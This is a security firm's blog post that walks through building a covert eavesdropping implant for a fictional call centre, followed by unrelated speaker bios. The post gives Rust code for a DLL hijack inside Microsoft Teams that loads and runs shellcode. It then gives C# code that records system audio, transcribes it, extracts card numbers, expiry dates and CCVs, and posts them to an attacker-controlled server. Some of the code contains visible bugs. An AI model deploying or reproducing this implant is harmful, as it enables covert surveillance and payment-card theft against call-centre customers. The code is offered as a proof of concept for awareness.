Eavesdropping: Is Listening enough?

By Sekuro Offensive Security Team

Introduction

In this post, we will discuss the fictitious scenario about an organisation that provides a call centre function to its customers that may sometimes process credit card payments. The organisation has concluded that an attacker extracting credit cards from the call centre by means of eavesdropping is low risk because “they are not going to listen to 10 hours of a workday for 3 or 4 credit cards”. Although considered unlikely, does an attacker really need to listen to every word?

There is no greater danger than underestimating your opponent.

We will approach this problem from the perspective of an attacker with assumed access or the ability to create files.

In the fictitious scenario, we have identified:

  • Customer calls are routed through Microsoft Teams to call centre staff
  • Most customer calls are to help with account issues
  • No more than 4 credit cards will be processed by a staff member in a typical workday
Solutions to implement:
  1. Persistent method to eavesdrop in call centre
  2. Automate the identification of credit card details
  3. Send collected data to infrastructure that is under our control

1. Persistent Method to eavesdrop in call centre

We will persist in the call centre by identifying a Dynamic link library (DLL) search order hijack in the Microsoft Teams software. If unfamiliar, DLL hijacking is technique where an application loads a DLL other than the one that was intended by the developer. 

To identify a target DLL we will launch Procmon with the following three filters:

·     Match any process name with “Teams.exe”
·     Match the result of any events with the value of “NAME NOT FOUND”
·     The final filter ensures matched events are DLLs

The Teams.exe application is in the following user writeable location:
·     
%USERPROFILE%\AppData\Local\Microsoft\Teams\current

DLL search order hijacking takes advantage of how Windows searches for a required DLL. Any DLL placed in the same directory as the Teams application that matches any of the DLLs listed below with “NAME NOT FOUND” will be loaded into memory by the Teams application. This happens because the standard DLL search order first checks the directory from which the application was loaded for the required DLL.

Our DLL, written in rust, will function as a simple loader for our second stage shellcode. A loader is a program that on execution loads another program, in our case the shellcode, into memory and executes it. The shellcode will be created from a program written in C# to take advantage of some of the abstractions the .NET Framework provides.

We start by declaring our imports:

				
					use winapi::{
    ctypes::c_void,
    shared::{
        minwindef::{BOOL, DWORD, HINSTANCE, LPVOID, TRUE},
    },
    um::{
        memoryapi::{VirtualAlloc, VirtualProtect, WriteProcessMemory},
        processthreadsapi::{CreateThread, GetCurrentProcess},
        winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READ, PAGE_READWRITE},
    },
};


				
			

When Windows loads a DLL and starts or stops a process or thread, if an entry point (function) named DllMain exists, user defined code will be executed on any of these events. On DLL_PROCESS_ATTACH, when the DLL is first loaded into the process memory space, our DllMain function calls a function to execute the shellcode in a thread.

The following code demonstrates that:

				
					#[no_mangle]
#[allow(non_snake_case, unused_variables)]
extern "system" fn DllMain(
    dll_handle: HINSTANCE,
    call_reason: DWORD,
    reserved: LPVOID,
) -> BOOL {
    const DLL_PROCESS_ATTACH: DWORD = 1;
    const DLL_PROCESS_DETACH: DWORD = 0;

    match call_reason {
        DLL_PROCESS_ATTACH => {
            inline_thread();
        },
        DLL_PROCESS_DETACH => {},
        _ => {},
    }
    TRUE
}

fn inline_thread() {
    let mut shellcode = include_bytes!("../loader.bin").to_vec();
    let shellcode_ptr: *mut c_void = shellcode.as_mut_ptr() as *mut c_void;
    unsafe {
        let addr_shellcode = VirtualAlloc(
            0 as _,
            shellcode.len(),
            MEM_COMMIT | MEM_RESERVE,
            PAGE_READWRITE
        );
        let mut ret_len: usize = 0;
        let _ = WriteProcessMemory(
            GetCurrentProcess(),
            addr_shellcode,
            shellcode_ptr,
            shellcode.len(),
            &mut ret_len
        );

        let mut old_protect: u32 = 0;
        let _ = VirtualProtect(
            addr_shellcode,
            shellcode.len(),
            PAGE_EXECUTE_READ,
            &mut old_protect
        );
        let _ = CreateThread(
            0 as _,
            0 as _, 
            std::mem::transmute(addr_shellcode),
            0 as _,
            0 as _,
            0 as _,
        );
    }
}


				
			

The second stage shellcode is read from the file “loader.bin” at compile time with the “include_bytes!()” macro. Rust function-like macros look like function calls but operate on the tokens specified as their argument, the macro is a way of writing code that writes other code also known as metaprogramming. For example, whilst writing and debugging our second stage payload, all that needs to be done is to place the shellcode into the project directory with the name “loader.bin”.

The only thing remaining for the DLL hijack is to decide on a target. In this case we will use “midimap.dll”, any DLL not resolved would have sufficed,  and then take advantage of the https://github.com/monoxgas/Koppeling project for export cloning and function proxying.

Export cloning is used so that when an executable attempts to resolve a function for execution in a DLL, either via the Import Address Table (IAT) or GetProcAddress (DLL loaded via LoadLibrary not specifying required functionality), the DLL Export Address Table (EAT) contains the expected functionality.

Function proxying is used so that any intended functionality in the application is not lost. This means that our created DLLs EAT will link to the EAT of the DLL that was intended to be loaded. In our example without function proxying, none of the Microsoft Teams sounds such as hang up, incoming and outgoing call sound functionality will be audible to the end user. This may bring our presence to the attention of the end user, which is something we would like to avoid.

End user wire tapping - Picture3

Place the DLL at the following location ”%USERPROFILE%\AppData\Local\Microsoft\Teams\current\midimap.dll” so that, with standard search order checks, our DLL will be loaded.

End user wire tapping - Picture4

To demonstrate our DLL was loaded, a console is allocated as opposed to executing shellcode as that will be covered next. Allocating a console loads a Graphical user interface (GUI) for applications to view standard input, standard output, and standard error. GUI applications are not initialised with a console; hence Microsoft Teams is not initialised with a console. In this example we allocate a console via the kernel32!AllocConsole function and print ascii to standard output as a PoC to verify everything is working as expected.

We can see the console allocated as a child process (conhost.exe), and loaded into memory from the directory we placed our DLL into:

2. Automate the identification of credit card details

Fortunately, the Microsoft Teams desktop app has already been approved to access the microphone and since we live within the “Teams.exe” process we inherit that access. The following C# code instantiates an event handler for any speech events recognised by the microphone on the target system. An event handler specifies a function that will be executed when an event has occurred. In .NET events are enabled via a subscriber to register with and receive notifications from a provider. The event handler, “recognition_Handler”, is responsible for deciding what to do with the recognised speech.

				
					static void Main(string[] args)
{
using (
SpeechRecognitionEngine recognizer = new SpeechRecognitionEngine(new System.Globalization.CultureInfo("en-US")))
{
    recognizer.LoadGrammar(new DictationGrammar());
        recognizer.SpeechRecognized +=
            new EventHandler(recognition_Handler);
        recognizer.SetInputToDefaultAudioDevice();
        recognizer.RecognizeAsync(RecognizeMode.Multiple);
        while (true) {}
    }
}


				
			

It may be interesting to know that we are not actually interested in the microphone audio. Why is that?

Well, when the call centre operator is on the phone to the customer, they would not repeat out the sensitive information but rather allow the customer to read out that information. That information will be sent to the audio output of the device for the operator to hear and therefore is where we, as the emulated attacker, must target.

As the astute reader you are, you may have already guessed another potential avenue to extract the target information. If the call centre operator types the credit card number out on their keyboard, we could log keystrokes and have an easy win. Great idea! Although in this scenario we are further assuming this type of functionality would not provide us with the information we are after, such as using a separate device to enter that information.

				
					static void recognition_Handler(object sender, SpeechRecognizedEventArgs e)
{
    TimeSpan t = DateTime.UtcNow - new DateTime(1970, 1, 1);
    int secondsSinceEpoch = (int)t.TotalSeconds;
    RecordSystem(secondsSinceEpoch);
    Thread.Sleep(5000)
    var customer_rec = File.ReadAllBytes(secondsSinceEpoch.ToString() + ".wav");
    string b64_customer_bytes = Convert.ToBase64String(customer_rec);
    analysis(b64_customer_bytes).Wait();
    File.Delete(secondsSinceEpoch.ToString() + ".wav");
}
public static void RecordSystem(int secondsSinceEpoch)
{
    MemoryStream waveInput = new MemoryStream();
    WasapiLoopbackCapture CaptureInstance = new WasapiLoopbackCapture();
    WaveFileWriter RecordedAudioWriter = new WaveFileWriter(secondsSinceEpoch.ToString() + ".wav", CaptureInstance.WaveFormat);
    CaptureInstance.DataAvailable += (s, a) =>
    {
        RecordedAudioWriter.Write(a.Buffer, 0, a.BytesRecorded);
    };
    CaptureInstance.RecordingStopped += (s, a) =>
    {
        RecordedAudioWriter.Dispose();
        RecordedAudioWriter = null;
        CaptureInstance.Dispose();
    };
    CaptureInstance.StartRecording();
    Thread.Sleep(5000);
    CaptureInstance.StopRecording();
}



				
			

The event handler does the following:

·     Keep track of when the recording took place
·     Records the system output for five minutes
·     Sends the recorded system audio to the analysis function

The analysis function makes use of the Google Speech-To-Text API for recognition of the recorded system audio. The inbuilt Microsoft “SpeechRecognitionEngine” works well enough if the dictionary for recognition is small, otherwise the accuracy is not great.

				
					static async Task<HttpResponseMessage> analysis(String b64)
{
    try
    {
        String payload = JsonConvert.SerializeObject( new {
            config = new {
                languageCode = "en-AU",
                encoding = "LINEAR16",
                sampleRateHertz = "16000",
            },
            audio = new {
                content = b64,
            },
        });
        var content = new StringContent(payload, Encoding.UTF8, "application/json");
        HttpResponseMessage response = await client.PostAsync("https://speech.googleapis.com/v1/speech:recognize?key=<INSERT-KEY>", content);
        String respBody = await response.Content.ReadAsStringAsync();
	 GoogleRet googleRet = JsonConvert.DeserializeObject<GoogleRet>(respBody);
        String transcript = googleRet.results[0].alternatives[0].transcript;
        String payload1 = JsonConvert.SerializeObject(new
        {
            document = new
            {
                type = "PLAIN_TEXT",
                content = transcript,
            }
        });
        var content1 = new StringContent(payload1, Encoding.UTF8, "application/json");
        HttpResponseMessage response1 = await client.PostAsync("https://language.googleapis.com/v1/documents:analyzeEntities?key=<INSERT-KEY>", content1);
        String respBody1 = await response1.Content.ReadAsStringAsync();
                
        Payload parsed = parse_target(transcript, respBody1, b64);
        Payload parsed = parse_target(respBody, b64);
        sendPayload(respBody).Wait();
        return response;
    }
    catch (Exception e)
    {
        return null;
    }
}

				
			

Once the speech has been analysed, the “parse_target” function performs a primitive parse on the text to create the payload to send remotely. The payload consists of a customer name, card number, expiry, CCV, transcript and base64 encoded recording.

				
					static Payload parse_target(String transcript, String entitiy_raw, String b64)
{
            
    try
    {	
        GoogleEntities googleRet = JsonConvert.DeserializeObject<GoogleEntities>(entitiy_raw);
        String transcript = googleRet.results[0].alternatives[0].transcript;
        string[] words = transcript.Split(' ');
        Payload payload = new Payload { };
        payload.b64_recording = b64;
        payload.number = "";
        String exp_ccv = "";
        foreach (Entity entity in googleRet.entities)
        {
            if (entity.type == "PERSON")
            {
                payload.name = entity.name;
            }
        }
        foreach (string word in words)
        {
            if (!word.All(Char.IsLetter))
            {
                if (payload.number.Length <= 16)
                {
                    int num_len = payload.number.Length;
                    if ((num_len + word.Length) < 16)
                    {
                        payload.number += word;
                    } 
                    else
                    {
                        int left = 16 – num_len;
                        payload.number += word.Substring(0, left);
                        exp_ccv += word.Substring(left);
                    }
                }
                else
                {
                    exp_ccv += word;
                }
            }
        }
        payload.expiry = exp_ccv.Substring(0, exp_ccv.Length - 3);
        payload.ccv = exp_ccv.Substring(exp_ccv.Length - 3);
        return payload;
    }
    catch (Exception e)
    {
        return null;
    }
}

				
			

The transcript and recording are sent as part of the payload so that any future improvements to parser logic can be applied to all historic recordings.

3. Send collected data to infrastructure that we control

At this point if dealing with actual sensitive data, it would absolutely be imperative to encrypt the data in transit over the wire. We are now ready to send the information collected to a web server we control.

				
					static async Task<HttpResponseMessage> sendPayload(Payload payload)
{
    try
    {
        var payloadStr = JsonConvert.SerializeObject(payload);
        var content = new StringContent(payloadStr, null, "application/json");
        HttpResponseMessage response = await client.PostAsync("https://<target-url>/static/register", content);
        return null;
    }
    catch (Exception e)
    {
        return null;
    }
}
				
			

Server side, we can see the collected information and fortunately we have the transcript and recording to further tune our parsing method and confirm the information gathered.

4. Conclusion

This was a quick exercise to demonstrate a minimal effort campaign to extract sensitive information from a fictional organisation.

We were able to create a PoC that demonstrated exfiltrating credit card information, while the attacker was not required to listen to any of the actual call centre conversations. These actions were performed with the same privileges that the call centre operator has on their everyday work machine. It further demonstrated, once a machine is compromised, how a trusted application can be used for long-term persistence and can potentially impact an organisations reputation and compliance.

Scroll to Top

Aidan Tudehope

Co-Founder of Macquarie Technology

Aidan Tudehope, Co-Founder of Macquarie Technology

Aidan is co-founder of Macquarie Telecom and has been a director since 1992. He is the Managing Director of Macquarie Government & Hosting Group with a focus on business growth, cyber security and customer satisfaction. 

Aidan has been responsible for the strategy and execution of the investment in Intellicentre 4 & 5 Bunkers, Macquarie Government’s own purpose-built Canberra data centre campus. This facility is leveraged to deliver Secure Cloud Services and Secure Internet Gateway.

With a unique pan-government view on the cyber security landscape, we are invested in leading the contribution from the Australian industry on all matters Cyber policy related.

Aidan holds a Bachelor of Commerce Degree.

James Ng

CISO, Insignia Financial

James Ng, CISO, Insignia Financial

James is a leader with a range of experience across various cyber security, technology risk and audit domains, bringing a global lens across a diverse background in financial services, telecommunications, entertainment, consulting and FMCG (Fast Moving Consumer Goods). He is currently the General Manager – Cyber Security at Insignia Financial and most recently was at AARNet (Australia’s Academic and Research Network) where he oversaw a managed Security Operations Centre (SOC) capability for Australian universities. Prior to this James was the acting Chief Information Security Officer for Belong and led the cyber governance and risk team at Telstra.

Noel Allnutt

CEO, Sekuro

Noel Allnutt CEO | Sekuro

Noel is a driven and award-winning IT leader. He has a passion for developing great teams and accelerating client innovation, and in enabling organisations to create a secure and sustainable competitive advantage in the digital economy. Noel also hosts the ‘Building Resilience Podcast,’ which explores the world of sport and deconstructs the tools and ethos of world-class athletes that can help create growth and optimise business and life.

Audrey Jacquemart

Bid Manager, Sekuro

Audrey Jacquemart, Bid Manager, Sekuro

Audrey is an innovative cybersecurity professional with a versatile profile spanning across Product Management, Presales and Delivery. She has worked within organisations from start-ups to large international organisations in Europe and APAC before joining Sekuro.

Nicolas Brahim

Principal Consultant, CRP and OT

Nicolas Brahim, Principal Consultant, CRP and OT

Nico leads Sekuro’s Cyber Resilience Program and OT Cybersecurity, ensuring continuous support and effective program execution for our clients. With over a decade in the security industry, including the creation and leadership of several Security Programs for IT and OT across Australia, New Zealand, Argentina, Chile and the US, his core philosophy emphasises an equal balance of people, process, and technology in delivering actionable and simple solutions.

Trent Jerome

Chief Financial Officer, Sekuro

Trent Jerome

Trent is a seasoned CFO with over 30 years’ experience in Finance. Trent has broad experiences across Capital raises, debt financing, M&A and business transformation. He is a CPA and member of AICD. Trent works with Boards around risk and risk mitigation plans and assists Boards in navigating the risk mitigation versus cost conversation.

Ada Guan

CEO and Board Director, Rich Data Co

Ada Guan, CEO and Board Director, Rich Data Co

Ada is the CEO and Co-founder of Rich Data Co (RDC). RDC AI Decisioning platform provides banks the ability to make high-quality business and commercial lending decisions efficiently and safely. With over 20 years of global experience in financial services, software, and retail industries, Ada is passionate about driving financial inclusion at a global scale.

Before launching RDC in 2016, Ada led a Global Client Advisor team at Oracle Corporation, where she advised Board and C-level executives in some of the largest banks globally on digital disruption and fintech strategy. She also drove Oracle’s thought leadership in banking digital transformation for Global Key Accounts. Previously, Ada implemented a multi-million dollar program to deliver a mission-critical services layer for Westpac Bank in Australia and formulated the IT strategy that was the basis of an $800m investment program to transform Westpac’s Product and Operation division and complete the merger with St. George Bank. Ada is an INSEAD certified international director and holds an EMBA from the Australia Graduate School of Management, and a Master of Computer Engineering from the University of New South Wales, Australia. She also graduated from the Executive Insight Program at Michigan University Ross Business School and IESE Business School.

Megan Motto

Chief Executive Officer, Governance Institute of Australia

Megan Motto, CEO, Governance Institute of Australia

Megan Motto is Chief Executive Officer of Governance Institute of Australia, a national education provider, professional association and leading authority on governance and risk management. The Institute advocates on behalf of professionals from the listed, unlisted, public and not-for profit sectors.

Megan has over 25 years of experience with large associations, as a former CEO of Consult Australia, as well as holding significant positions in Australia’s built environment sector and business chambers.

She is currently a director of Standards Australia, a member of the ASIC Corporate Governance Consultative Panel and a councillor of the Australian Chamber of Commerce and Industry (ACCI) where she chairs the Data, Digital and Cyber Security Forum.

Megan’s expertise spans governance, risk management, public policy and education. She holds a Bachelor of Arts/Bachelor of Education, a Masters of Communication Management and a Graduate Diploma of Corporate Governance and Risk Management. She is a Fellow of the Governance Institute of Australia, the Chartered Governance Institute and the Australian Institute of Company Directors and is also a member of Chief Executive Women. Megan is also an Honorary Life Trustee of the Committee for Economic Development of Australia (CEDA) and was a 2014 recipient of the AFR/Westpac 100 Women of Influence.

Shamane Tan

Chief Growth Officer, Sekuro

Shamane Tan, Chief Growth Officer, Sekuro

Sekuro’s Chief Growth Officer, Shamane Tan, is passionate about uniting minds and experiences, excelling in aligning C-Suite and Board members with cyber security imperatives. As the author of “Cyber Risk Leaders,” she unravels executive communication nuances and distils C-Suite expectations. 

Her work extends to “Cyber Mayday and the Day After,” a roadmap for navigating crises by mining the wisdom of C-level executives from around the globe. It’s filled with interviews with managers and leaders who’ve braved the crucible and lived to tell the tale. Her most recent book, “Building a Cyber Resilience: A Cyber Handbook for Executives and Boards,” was featured on Forbes Australia’s top list of books for CEOs. 

Shamane has also founded a transcontinental cyber risk and executive meetup spanning Sydney, Melbourne, Adelaide, Perth, Singapore, the Philippines, and Tokyo, fostering mentorship, women’s empowerment and thought leadership. As a strong advocate for the importance of having a voice and helping others use theirs, Shamane Tan has spoken at TEDx and global conferences, including FS-ISAC, RSA, Silicon Valley, Fortune 500 and ASX companies. 

Recipient of the IFSEC Global Top 20 Cybersecurity Influencer award and named among the 40 under 40 Most Influential Asian-Australians, Shamane leverages her unique fusion of technical prowess and business acumen to help organisations progress on their security maturity journey.

David Gee

David Gee, CIO, CISO, NED, Board Advisor & Author

 

David Gee, CIO, CISO, NED, Board Advisor & Author

David has just retired in July 2024 and is building out his portfolio. He is an Advisor with Bain Advisory Network and also an Advisor to JS Careers (Cyber Recruitment) and Emertel (Software Commercialisation).

He is a seasoned technology executive with significant experience and has over 25 years’ experience in CIO and CISO roles across different industries and countries. At Macquarie Group David served as Global Head Technology, Cyber and Data Risk. Previously was CISO for HSBC Asia Pacific. His career as a CIO spans across multiple industries and geographies including – Metlife, Eli Lilly and Credit Union Australia. He was winner CIO of the Year 2014, at CUA where he successfully completed a significant Transformation of Core Banking, Online and Mobile Banking systems.

David is past Chairman for the FS-ISAC Strategy Committee and awarded Global Leaders Award in 2023 for his contributions to the cyber security industry. A regular conference keynote speaker and 150+ published articles for CIO Australia, Computerworld, iTnews and CSO (Cyber Security), David now writes for Foundry CIO.com and AICD.

His most recent book – the Aspiring CIO & CISO was published in June 2024 and David is writing his second – A Day in the Life of a CISO with a number of CISOs from around the world for 2025.

Naomi Simson

Co-founder, Big Red Group and Former Shark Tank Judge

Naomi Simson, Co-founder, Big Red Group

INTRODUCTION

For 25 years as an entrepreneur, Naomi Simson has been bringing people together whether it’s with her business experience, her speaking or writing. Passionate about small business and local community, Naomi is considered a home grown success story.

Naomi had a corporate career with Apple, KPMG, IBM and Ansett Australia prior to becoming an entrepreneur. She is a prolific blogger, podcaster and business commentator, and appeared as the #RedShark in four seasons of Shark Tank Australia and she appears regularly on ABC The Drum. She is a non-executive director at Big Red Group, Australian Payments Plus, Colonial First State and Weebit Nano, as well as the Cerebral Palsy Research Foundation and the University of Melbourne Business and Economics Faculty.

A true business leader and influencer, with more than 2.7 million LinkedIn followers, Naomi is Australia’s most followed person on the business networking platform. She has four seasons of her podcast ‘Handpicked’, and she has authored two best-selling books Live What You Love, and Ready to Soar, and is sought after speaker.

FULL BIO

For 25 years Naomi has been bringing people together whether it’s with her business experience, her speaking or writing. She is a strong advocate of business owners.

Known as an entrepreneur and business leader; following the growth of RedBalloon which she founded in 2001, Naomi co-founded the Big Red Group (BRG) in 2017.

Naomi had a corporate career with Apple, KPMG, IBM and Ansett Australia prior to becoming an entrepreneur. She is a prolific blogger, podcaster and business commentator, and appeared as the #RedShark in four seasons of Shark Tank Australia. She is a non-executive director at Big Red Group, Australian Payments Plus, Colonial First State and Weebit Nano. As well as the Cerebral Palsy Research Foundation and the University of Melbourne Business and Economics Faculty.

A true business leader and influencer, with more than 2.7 million LinkedIn followers, Naomi is Australia’s most followed person on the business networking platform. She has authored two best-selling books Live What You Love, and Ready to Soar, and is an engaging, humorous and insightful speaker. She has four seasons of her Podcast – Handpicked.

Naomi is relatable across a broad variety of audiences and topics, often drawing on her personal experiences to provide thoughtful and valuable views into topics; including the customer obsession, intentional leadership, growth mindset, personal development. She is a regular panellist on ABC The Drum.

Peter Ngo

Product Line Manager, Global Certifications, Palo Alto Networks

Peter Ngo

Peter leads the Commercial Cloud, Global Certifications organisation at Palo Alto Networks which oversees global cloud security compliance efforts to various frameworks and standards including IRAP, SOC 2, ISO, PCI, C5, ISMAP, and IRAP and more for 25+ cloud products.

He has held many roles over the years covering areas of IT Operations, and Governance, Risk, & Compliance (GRC) for a wide range of industries including technology, insurance, and manufacturing.

Peter holds various security and professional certifications, including the CCSP, CISSP, PCI ISA, CISA, CISM, CDPSE & ISO Lead Auditor, in addition to a Master of Science degree in Information Assurance. 

Jack Cross

CISO, QUT

Jack Cross

Jack Cross is an experienced business leader with expertise in digital technologies and risk management. Through a steadfast commitment to integrating people, processes, and technology, he champions the fight against cyber threats while mitigating organisational risks. 

Over the past 15 years, Jack has navigated diverse leadership roles within the Defence and Education sectors, honing his skills in steering multidisciplinary teams through intricate and sensitive technical landscapes. In addition to this experience, he holds numerous formal qualifications such as: a Master of Systems Engineering (Electronic Warfare); CISSP; and CISM certifications.

Nadene Serman

Global CTO, Infotrack

Nadene Serman

Nadene Serman is a leading IT executive with a proven track record spearheading first-of-its-kind technology and business transformation for some of the most prominent organisations globally and in Australia. As the Global Chief Technology Officer of InfoTrack, she is a key protagonist of innovation as an enabler of InfoTrack’s next stage growth. Her energy, commercial acuity and strategic capability have fueled her success.

Nadene leads with clarity, transparency and urgency, uniting people in complex, multi-layered technology and business execution, and go-to-market transformation and innovation. She tackles and resolves complex and seemingly intractable challenges while building support and collaboration – even in times of crisis. Her people-first, ‘think straight, talk straight’ approach makes her a formidable force.

John Doe

President Great Technology

Cyber Resilience Program | Sekuro

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.